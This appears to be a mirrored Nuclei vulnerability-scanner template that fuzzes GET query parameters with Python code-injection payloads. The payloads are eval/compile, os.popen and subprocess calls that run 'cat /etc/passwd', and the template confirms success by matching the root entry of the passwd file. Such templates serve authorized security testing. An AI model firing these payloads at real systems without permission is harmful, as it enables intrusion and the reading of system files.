mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-04 17:53:27 +08:00
50 lines
1.9 KiB
YAML
50 lines
1.9 KiB
YAML
id: python-code-injection
|
|
|
|
info:
|
|
name: Python Code Injection
|
|
author: ritikchaddha
|
|
severity: high
|
|
metadata:
|
|
max-request:
|
|
tags: python,dast,injection,cmdi
|
|
|
|
variables:
|
|
Command: "cat /etc/passwd"
|
|
|
|
http:
|
|
- pre-condition:
|
|
- type: dsl
|
|
dsl:
|
|
- 'method == "GET"'
|
|
|
|
payloads:
|
|
injection:
|
|
- eval(compile("""for x in range(1):\\n import os\\n os.popen(r'{{Command}}').read()""",'','single'))
|
|
#without loop, one expression
|
|
- eval(compile("""__import__('os').popen(r'{{Command}}').read()""",'','single'))
|
|
#without loop, one expression
|
|
- eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True)""",'','single'))
|
|
#without compile
|
|
- __import__('os').popen('{{Command}}').read()
|
|
#multiple expressions, separated by commas
|
|
- str("-"*50),__import__('os').popen('{{Command}}').read()
|
|
#multiple statements, separated by semicolons
|
|
- eval(compile("""__import__('os').popen(r'{{Command}}').read();import time;time.sleep(2)""",'','single'))
|
|
- eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True);import time;time.sleep(2)""",'','single'))
|
|
#with `for` loop technique, without global __import__ using subprocess.popen
|
|
- eval(compile("""for x in range(1):\n import os\n os.popen(r'{{Command}}').read()""",'','single'))
|
|
- eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'{{Command}}',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))
|
|
- eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'{{Command}}',shell=True)""",'','single'))
|
|
|
|
fuzzing:
|
|
- part: query
|
|
type: replace
|
|
fuzz:
|
|
- "{{injection}}"
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- 'root:.*:0:0:' |